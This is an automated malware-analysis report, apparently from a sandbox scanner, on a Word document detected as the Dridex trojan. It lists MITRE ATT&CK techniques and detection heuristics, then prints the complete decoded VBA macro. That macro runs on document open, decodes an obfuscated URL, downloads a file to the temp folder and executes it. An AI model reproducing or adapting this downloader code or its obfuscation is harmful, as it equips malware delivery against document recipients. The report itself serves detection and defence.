Verdict: MALICIOUS
Risk Score: 376
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of URLDownloadToFile and obfuscated auto-exec loaders, suggesting the macro's purpose is to download and execute a secondary payload. ClamAV detection as Doc.Trojan.Dridex-7 further supports this assessment.
Heuristics (10)

- ClamAV: Doc.Trojan.Dridex-7 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Dridex-7
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD): URLDownloadToFile in VBA. Matched line in script: `"URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: `рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$ …`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5345 bytes |

SHA-256 of macros.bas: 5d2083fe1fa0609a69a7dbf96641768d6d3fad7e3b373aa1b8ef6aa4ae9c792f
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FUvhdsfkHJfg
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "АавпавпАА"
Public Function FhjvhjsdfksdfF(VdkAbaqgjbz As String) As String
For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
FhjvhjsdfksdfF = FhjvhjsdfksdfF & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
Next
End Function
Attribute VB_Name = "ываывААва"
#If VBA7 Then
Private Declare PtrSafe Function гшПНШываа Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
ByVal ПСрпспсппОап As String, _
ByVal ПСрпспсппОапf As String, _
ByVal ПСрпспсппОапfd As Long, _
ByVal ПСрпспсппОапfds As LongPtr) As LongPtr
#Else
Private Declare Function гшПНШываа Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
ByVal ПСрпспсппОап As String, _
ByVal ПСрпспсппОапf As String, _
ByVal ПСрпспсппОапfd As Long, _
ByVal ПСрпспсппОапfds As Long) As Long
#End If
Sub FUvhdsfkHJfg()
рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$(51) & Chr$(105) & Chr$(64) & Chr$(110) & Chr$(96) & Chr$(46) & Chr$(48) & Chr$(101) & Chr$(46) & Chr$(120) & Chr$(77) & Chr$(101) & Chr$(58)), Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
109) & Chr$(80) & Chr$(123))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
End Sub
Function рпорпАавпавп(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
плрпААавпп = гшПНШываа(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
ываААвыаыва.Open Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function